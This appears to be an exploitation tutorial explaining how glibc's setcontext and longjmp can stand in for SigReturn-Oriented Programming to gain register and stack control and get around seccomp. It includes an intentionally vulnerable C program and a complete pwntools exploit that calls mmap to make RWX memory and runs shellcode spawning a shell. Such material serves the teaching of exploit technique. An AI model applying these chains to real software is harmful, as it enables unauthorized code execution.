setcontext

Glibc's answer to sigreturn

SROP

SROP (SigReturn Oriented Programming) is a useful technique that allows an attacker to get full control over all the registers, including pc and sp. This is useful for calling arbitrary functions or syscalls with controlled arguments, or stack pivoting for example. Typically you'd do it by:

  • Setting rax/eax to SYS_rt_sigreturn/SYS_sigreturn.

  • Passing a forged SigreturnFrame on the stack.

  • Executing a syscall.

This approach is usually doable with some decent control over the process, such as with a ROP chain that looks something like the following:

|------------------|
|  pop rax ; ret   |
|------------------|
| SYS_rt_sigreturn |
|------------------|
|     syscall      |
|------------------|
|                  |
|  SigreturnFrame  |
|                  |
|------------------|

But a technique like SROP would be useful in cases where we have less control (i.e when we don't have ROP), as it grants great control over the process (pc control, stack pivoting, argument control etc.).

Attack scenario

// gcc vuln.c -o vuln -fstack-protector -Wl,-z,relro,-z,now
#include <stdlib.h>
#include <stdio.h>

int main() {
	// libc leak
    printf("printf: %p\n", &printf);

	// controlled data
    void *ptr = malloc(0x400);
    printf("ptr: %p\n", ptr);
    fgets(ptr, 0x400, stdin);

	// function call primitive with controlled argument
    void (*func)(void*);
    scanf("%zu", (unsigned long*)&func);
    getchar();

    func(ptr);
}

Take the totally realistic example above, where you have a function call primitive with a controlled first argument (you can get this in glibc in multiple ways, like __free_hook for example). In most cases, you can overwrite this to system, and free a /bin/sh string, and call it a day.

But it's not always that simple, because seccomp may be in play, and can block execve, so that system doesn't work. Now what?!

The ideal way to bypass seccomp is to either get ROP or shellcode execution. Here we'll focus on getting ROP, but usually with ROP you can get shellcode execution by mmap'ing a new region, or mprotect'ing an existing one. One way to get ROP is by using stack pivoting, and what technique do we know of that can help stack pivoting? That's right, its our good pal SSTI SROP!

Glibc sigreturn wrapper?

But how do we call a sigreturn syscall? Well, glibc may hold the answers to our prayers. Glibc has implementations of many linux syscalls, many of which are thin wrappers around the actual syscall.

So searching for sigreturn in the glibc codebase yields:

We get a prototype, and generic implementation that does nothing. While there are some implementations for other architectures, there's nothing for x86. We can also see this when looking at the disassembly.

Bummer! It's a shame too, because it would've fit our attack scenario pefectly, as it takes one argument: a pointer to a sigcontext (aka a SigreturnFrame). Thankfully however, we don't need sigreturn, as glibc provides 2 more alternatives: longjmp and setcontext.

longjmp

longjmp is used for non-local gotos, which essentially means you can jump between different points across different functions. The way it works is by:

  1. Using setjmp to save the current stack information to some buffer, such as scratch registers used for storing variables, rbp, rsp, and rip. This first call will return 0 to indicate that this is saving the information.

  2. Elsewhere in the code, there may be a call to longjmp which references the buffer containing the saved stack information. This will restore all the registers that were saved, including rip, meaning it will jump to where the setjmp call returned.

  3. Importantly, in this call to longjmp, you also pass an extra value, which is put into rax, to make it look like setjmp returned something. This value must be non-zero to distinguish it from the initial call to setjmp, so that it knows its been jumped to.

An example use case is going up the callstack in the case of some exception, where it would be easier to jump there immediately rather than having many functions in the call stack keep returning errors until you reach the main function. The following is an abstract example of this.

#include <setjmp.h>

jmp_buf env;

void some_func(void* data) {
    // This could be some function called when executing do_processing
    // And could be far down in the call stack
    ...
    if (some_error)
        longjmp(env, 69);
    ...
}

void do_processing(void* data) {
    /*
    Lots of complicated processing with many nested function calls
    */
    ...
}

void process_data(void* data) {
    int errno = setjmp(env);
    if (errno == 0) {
        ...
        do_processing(data);
        ...
    } else {
        printf("Error code %d found\n", errno);
    }
}

It's important to note that going down the callstack is undefined behaviour, because that could be jumping to an area of the stack that's been clobbered by stack usage since the creation of the jmp_buf.

How does it work?

Let's dive (or rather jump (you can laugh now)) in and have a closer look at what's happening.

setjmp is effectively a thin wrapper around sigsetjmp, where it sets savesigs to 1 (this isn't too important to us).

Here we see that scratch registers r12-r15 are saved as-is, but rbp, rsp, rip (as of before the call to setjmp) are first mangled (using PTR_MANGLE), then saved to the buffer.

longjmp is fairly similar:

There a few extra steps, like _longjmp_unwind which calls some cleanup operations, which we won't worry about for now. We can skip to main function __longjmp:

And as expected, it restores everything that was saved, and needs to unmangle rbp, rsp, rip.

Exploitation

So coming back to our attack scenario, longjmp could be a resonable candidate:

  • One argument which points to a context buffer.

  • Control over important registers: rbp, rsp, rip.

And while you don't have immediate control over other registers like you would in SROP, this level of control is enough to craft a small rop chain to call a sigreturn syscall (like the one I described here). You could also set rax using longjmp if you can control the 2nd argument rsi, and point rsp directly to a SigreturnFrame.

The main drawback is the fact that it uses pointer mangling, meaning you need to leak/overwrite the pointer guard fs:[0x30]. While this may just be an extra step in some cases, it can be more problematic in cases where you have weaker primitives (like in our example). So, can we do better?

setcontext

setcontext allows for user-level context switching, and is basically just sigreturn implemented manually in glibc. The usage is similar to longjmp:

  • Use getcontext to save the information of the current context, which includes most registers and some signal information.

  • Use setcontext to return to a previously saved context, starting right after the getcontext call as expected.

However unlike longjmp, there's no way of distinguishing whether a return from a getcontext call is the first or not, because rax would always be 0 (setcontext/getcontext return 0 on success), and most registers are restored.

How does it work?

The code for setcontext and getcontext is written in assembly, but is also fairly simple.

getcontext is just saving the scratch and argument registers, plus rsp and rip to the structure.

And as you can imagine, setcontext just restores all those registers (plus signal information).

The structure in question is ucontext_t, which is actually a structure very similar to the linux kernel's ucontext_t, which is used for the kernel's implementation of rt_sigreturn.

So if setcontext is just replicating rt_sigreturn, why not just use the syscall?

My best guess is that setcontext isn't a perfect match to rt_sigreturn, as you can't control every register using setcontext, such as rax (forced to be 0) and r10 and r11 (temporary/scratch registers).

Interestingly also, most architectures implement it manually, except for a few like sparc64.

Exploitation

Unlike longjmp, we don't need to bypass any pointer mangling, so this is ideal for our attack scenario. In this example, we'll aim to get shellcode execution, which can be done with the use of ROP:

  1. Use mmap to create a rwx memory section.

  2. Read in our own shellcode.

  3. Jump to the shellcode.

To craft the ucontext_t, we can actually just use SigreturnFrame in pwntools, because glibc's ucontext_t is basically the same as the kernel's version (at least with the fields we care about).

The structures seem to be the same upto the end of uc_mcontext (which is covered by SigreturnFrame), but afterwards they're slightly different, mainly due to differences in what signal information is stored. We don't usually need to worry about these fields, and neither does SigreturnFrame, so it works well enough for our purposes.

However unlike typical SROP, we need to specify a pointer to the fpstate. When &fpstate is NULL, sigreturn will ignore fpstate, but since getcontext always populates this field, setcontext assumes it will exist, and so it will crash here.

Any valid pointer should work, as the fields in fpstate probably won't make a difference in most cases, but in this example I'll construct it like getcontext would, meaning it should point to ucontext+0x1a8:

We can construct the fpstate as follows:

fpstate = {
    0x00: p16(0x37f),   # cwd
    0x02: p16(0xffff),  # swd
    0x04: p16(0x0),     # ftw
    0x06: p16(0xffff),  # fop
    0x08: 0xffffffff,   # rip
    0x10: 0x0,          # rdp
    0x18: 0x1f80,       # mxcsr (overlaps with ucontext+0x1c0)
    # 0x1c: mxcsr_mask
    # 0x20: _st[8] (0x10 bytes each)
    # 0xa0: _xmm[16] (0x10 bytes each)
    # 0x1a0: int reserved[24]
    # 0x200: [end]
}

Putting all of this together, we can craft the following exploit.

#!/usr/bin/python3
from pwn import *
from sys import argv

e = context.binary = ELF('vuln')
libc = ELF('libc', checksec=False)
ld = ELF('ld', checksec=False)
if len(argv) > 1:
	ip, port = argv[1].split(":")
	conn = lambda: remote(ip, port)
else:
	conn = lambda: e.process()

p = conn()

p.recvuntil(b"printf: ")
printf = int(p.recvline(), 16)
log.info(f"printf: {hex(printf)}")

libc.address = printf - libc.sym.printf
log.info(f"libc: {hex(libc.address)}")

p.recvuntil(b"ptr: ")
ptr = int(p.recvline(), 16)
log.info(f"ptr: {hex(ptr)}")

def setcontext(regs, addr):
	frame = SigreturnFrame()
	for reg, val in regs.items():
		setattr(frame, reg, val)
	# needed to prevent SEGFAULT
	setattr(frame, "&fpstate", addr+0x1a8)
	fpstate = {
	0x00: p16(0x37f),	# cwd
	0x02: p16(0xffff),	# swd
	0x04: p16(0x0),		# ftw
	0x06: p16(0xffff),	# fop
	0x08: 0xffffffff,	# rip
	0x10: 0x0,			# rdp
	0x18: 0x1f80,	    # mxcsr
	# 0x1c: mxcsr_mask
	# 0x20: _st[8] (0x10 bytes each)
	# 0xa0: _xmm[16] (0x10 bytes each)
	# 0x1a0: int reserved[24]
	# 0x200: [end]
	}
	return flat({
	0x00 : bytes(frame),
#	0xf8: 0					# end of SigreturnFrame
	0x128: 0,				# uc_sigmask
	0x1a8: fpstate,			# fpstate
	})

addr = 0xdead000
addr_rop = ptr + len(setcontext({}, 0))

data = setcontext({
	# mmap(addr, 0x1000, rwx, 0x22, -1, 0)
	"rip": libc.sym.mmap,
	"rdi": addr,
	"rsi": 0x1000,
	"rdx": 7,
	"rcx": 0x22,
	"r8": -1,
	"r9": 0,
	# execute rop afterwards
	"rsp": addr_rop
}, ptr)

rop = ROP(libc)
rop.gets(addr)
rop.raw(addr)

data += rop.chain()
#gdb.attach(p)
p.sendline(data)
p.sendline(str(libc.sym.setcontext).encode())

p.sendline(asm(shellcraft.linux.sh()))

p.interactive()

Last updated